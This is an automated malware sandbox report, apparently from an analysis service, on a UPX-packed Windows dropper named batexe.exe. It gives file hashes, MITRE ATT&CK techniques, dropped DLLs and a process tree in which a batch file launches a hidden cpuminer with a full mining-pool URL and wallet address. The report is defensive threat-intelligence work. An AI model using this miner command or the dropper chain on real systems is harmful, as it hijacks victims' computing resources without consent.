73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 05:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1712	b2e.exe
4572	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4572	cpuminer-sse2.exe
4572	cpuminer-sse2.exe
4572	cpuminer-sse2.exe
4572	cpuminer-sse2.exe
4572	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2160-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 1712	2160	batexe.exe	91
PID 2160 wrote to memory of 1712	2160	batexe.exe	91
PID 2160 wrote to memory of 1712	2160	batexe.exe	91
PID 1712 wrote to memory of 3816	1712	b2e.exe	92
PID 1712 wrote to memory of 3816	1712	b2e.exe	92
PID 1712 wrote to memory of 3816	1712	b2e.exe	92
PID 3816 wrote to memory of 4572	3816	cmd.exe	95
PID 3816 wrote to memory of 4572	3816	cmd.exe	95

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6959.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3816
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe

Filesize
1.9MB

MD5
dd120be9024c8db98339b2d7d0cf98a7

SHA1
a6639a0758768cf3ece2582526fc14f7ca3f3293

SHA256
c149ec57eb5c607f160df585fda9e525d186f011eb40405d98fe5c6c7432880a

SHA512
210a8a010a6bf033f2b0554520b638f66b6d56e3061dadd71cb708872de9a2d57528392ee9c52838e4aab1ff139c5463c14b36300bccd3be83db7013f18fc9d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe

Filesize
195KB

MD5
51fa474a860faa1fb1d707c30c9c450d

SHA1
c0bf3e365884dd363792c4e95827ffc49692f223

SHA256
8471cc2995134f2026dfd4f279ef13e453bb5901240ce7ca28fd551855f2e6fc

SHA512
81f4b563522dafe8171929f3d637a7c640c504bedfa41686bfdbd888a077585edb93afd42962872358e3771362ddf603074869230e864f2b050a5b7222e982bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\662C.tmp\b2e.exe

Filesize
160KB

MD5
bc208b87a9ee269e2d82e2a4fe224ae0

SHA1
8313d1e06ae6ce71a4ff06ba702cc3adc73db9ca

SHA256
c5e9cd96e24f5ee777d2425d6676069e3c3955e9afc6f4be46831f2cfd37cc8e

SHA512
04763319cfa045cd5a6b180f68d743ffd534b06618b79dec85f7462ec4caf67926140e2b788bb4eb7d46ebce202f518fac45e930a819f7be13c2eb996df08705

Download Submit
C:\Users\Admin\AppData\Local\Temp\6959.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
827KB

MD5
115f4233697af0f475351a633bd88c39

SHA1
d60d560e307b798e942c142597360fa762084dc5

SHA256
2e9b4cfecacf2aa451e283722c34003e9036dddd8c7dad8fcc601ab2b0f438c8

SHA512
e18e3b7b1fcbe75b43060b10d690934771e5ff9325a1fc7151c6bd07e721614e8d0be903073504e76610f01f85cf3ad77623c3f7c62f4b6a28829fa0477f94ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
539KB

MD5
0143ce48f566e290b642270decb05248

SHA1
4bdbda5180c4c11e03b79fe91ccaab68d939d847

SHA256
1804f4c29e22b95acbee0da2fa492924fda99f3f79edd530d777b3b9410e03cf

SHA512
1d468b6817356ad2f128e767b67b39d27a49f31d922f0ba5ada6836f6eaacc2fc87b1bc4137263bf9b56fa2d72913f3ff2e953520a48e36b24af638fa966ed9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
567KB

MD5
cf7dcfcc61e42ea0bdf9b6b2bf8412b9

SHA1
449eee947536e5e2b90c6a28b0ba39e20759eb12

SHA256
cd127c17f1c7c196b8a3869ad2c9763a1e139855979e74b67e61512585b67090

SHA512
6d084d660fffc0c3443b3ada069289fd532534709216e4171b02f43756e6338faa65a2ffc9ae6de6b0a011e790ae3d0a4bddc30ab6e0b032e6fd2f5a455e9a48

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
661KB

MD5
6dcd4bdf461014d434b6d0605bcd000a

SHA1
36223cfb32be591c9ee973cbd582bb4298d11f5f

SHA256
cb0ea90f33a2b6166b4770065b0c2939044d98931678cbe02dbcf49fb2e65113

SHA512
0017771d0dbbed710692f3135c5da03b4ca464a48ebea999e463711ba73861d54a9bd050167a213b389c3a60111353e39956ef96a999527eda403440e6daa43e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
675KB

MD5
8ca9467bfdec50ced9fc12ddf6b3ca23

SHA1
f2830b736329d8b65f6df2e632e5d723b07f6ddb

SHA256
3f02f761164ca51821957466ec8e5c6d18b9f6b82aebb2ed33c3ff02ecd28c99

SHA512
e6507d8fd332277bc8c9219a8e3ff925a299da89620c4b3e1527998256e4573d71fabce82db8ec5dfc2784b2480c73d197ed58fd9a41df8ac6f60d00bc7f8625

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
564KB

MD5
c001fa39065aa957b91ce42f78a0e809

SHA1
c83636f153ad1ff3c1cf992f56fdd0d2d978b18a

SHA256
e164a793c29f970fdaba7c3004be7183953c0bb5aabfebe2d5a361d543cb3abe

SHA512
e6129306be1e9d4456a1179a292a5c86239f3e6ea453b6149019bee06da79b1252f1fb64ab4b443d3f49a25df53ed49bca07cf07ad241f6c14ca28619c81fdac

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
552KB

MD5
5cb1f5d193f294970e8d580814a7c4b3

SHA1
34cb6e91a892e45045ba66b1005c7cc42d69fa44

SHA256
454d5b9b7bc7b9f33b115a2f8030fa6676e9d68f78f8991fd5c9fad9e76ef536

SHA512
e7e2073522fb5cb83ae244aae07288e910720e30199a388ef596b03d3c53ce5855b51425fe714c74f35299b8c714b3f159e59887f74799a9908a708aa5940b08

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
620KB

MD5
6307a2bf5c4a1f22fd1be8a5fa9db7d4

SHA1
7db4021ea193b1038c936da66d270a3f6e526749

SHA256
c08fa68624051cc3e9deecef5b6fd0e0d1ddf9fa278f84ce3a6002145c5c83dc

SHA512
3741058b7b4abde485096f271e87718fcb5cc780b81990076e6e6dd67461042032d387670632e61b493fbdb4d03f65df627ffb9966c3d38f3420a1e7240b24e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
655KB

MD5
5c3004e8ef491f1f13b972af63fd7bcd

SHA1
c7ae4e8c3614250a2b520bf49ff38b8d8af1fc87

SHA256
92cad41cb51254b1a409c6fbd4d5134c884f9189b87660a3504af5b4de42da61

SHA512
dc4eba1a7f11738c91aba1c50cb593306b623f73fba6ccd58327751160ca11d761fa1ae642e862ed3fc158fb8685b7d0a0b34fa1567c5ea2325d3c0005e1927b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
396KB

MD5
41df0eb6945938ed57a27266d0f005ae

SHA1
e1da06028389f7a6d7cc6bbae0c6cf5627435d15

SHA256
b8c7867893f00db0c1ed3ea8c20df9bd86d1105222e0b8d46376fd63f29f4a44

SHA512
c84375a4ae73922887c81d76a217ee94edac1de0e7992d06bb357cad1006b0d731923158880b12143f88163d0a5604f46bcd1b5f4abb2f333b0fba7c1b823f56

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1712-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1712-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2160-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4572-46-0x0000000065B60000-0x0000000065BF8000-memory.dmp

Filesize
608KB

Download
memory/4572-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-47-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/4572-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4572-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4572-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4572-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download